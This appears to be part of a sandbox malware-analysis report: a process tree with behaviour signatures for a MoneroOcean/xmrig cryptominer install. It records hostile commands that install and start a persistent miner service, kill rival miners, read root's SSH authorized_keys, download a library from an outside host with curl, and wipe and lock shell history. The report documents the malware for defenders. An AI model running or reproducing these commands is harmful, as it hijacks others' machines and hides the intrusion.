  - /bin/sed (PID 1655): sed -i "s/\"background\": *false,/\"background\": true,/" /usr/sbin/moneroocean/config_background.json
    signatures: Attempts to change immutable files; Write file to user bin folder
  - /bin/cat (PID 1656): cat
  - /bin/chmod (PID 1657): chmod +x /usr/sbin/moneroocean/miner.sh
  - /usr/bin/sudo (PID 1658): sudo -n true
    - /bin/true (PID 1659): true
  - /bin/cat (PID 1663): cat
  - /usr/bin/sudo (PID 1664): sudo mv /tmp/moneroocean_miner.service /etc/systemd/system/moneroocean_miner.service
    - /bin/mv (PID 1665): mv /tmp/moneroocean_miner.service /etc/systemd/system/moneroocean_miner.service
  - /usr/bin/sudo (PID 1666): sudo killall xmrig
    - /usr/bin/killall (PID 1667): killall xmrig
      signatures: Reads runtime system information
  - /usr/bin/sudo (PID 1668): sudo systemctl daemon-reload
    - /bin/systemctl (PID 1669): systemctl daemon-reload
  - /usr/bin/sudo (PID 1690): sudo systemctl enable moneroocean_miner.service
    - /bin/systemctl (PID 1691): systemctl enable moneroocean_miner.service
  - /usr/bin/sudo (PID 1712): sudo systemctl start moneroocean_miner.service
    - /bin/systemctl (PID 1713): systemctl start moneroocean_miner.service
      signatures: Reads runtime system information
  - /bin/mkdir (PID 1715): mkdir -p /root/.ssh/
  - /bin/cat (PID 1716): cat /root/.ssh/authorized_keys
  - /usr/bin/curl (PID 1717): curl -Lk http://chimaera.cc/so/xmrig.so -o /etc/lib.so
  - /bin/rm (PID 1724): rm -fr /usr/sbin/.bash_history
  - /usr/bin/touch (PID 1725): touch /usr/sbin/.bash_history
    signatures: Write file to user bin folder
  - /usr/bin/chattr (PID 1726): chattr +i /usr/sbin/.bash_history
    signatures: Attempts to change immutable files
  - /bin/sleep (PID 1727): sleep 3
  - /usr/bin/clear (PID 1728): clear
- /usr/bin/awk (PID 1590): awk "{print \$5}"
- /bin/ls (PID 1589): ls -al /.dockerenv
- /usr/bin/bc (PID 1601): bc -l
- /usr/bin/cut (PID 1646): cut -f1 -d.
- /bin/hostname (PID 1645): hostname
- /bin/sed (PID 1647): sed -r "s/[^a-zA-Z0-9\\-]+/_/g"
- /usr/bin/awk (PID 1662): awk "{print \$2}"
- /bin/grep (PID 1661): grep MemTotal /proc/meminfo
Network
MITRE ATT&CK Enterprise v15
Downloads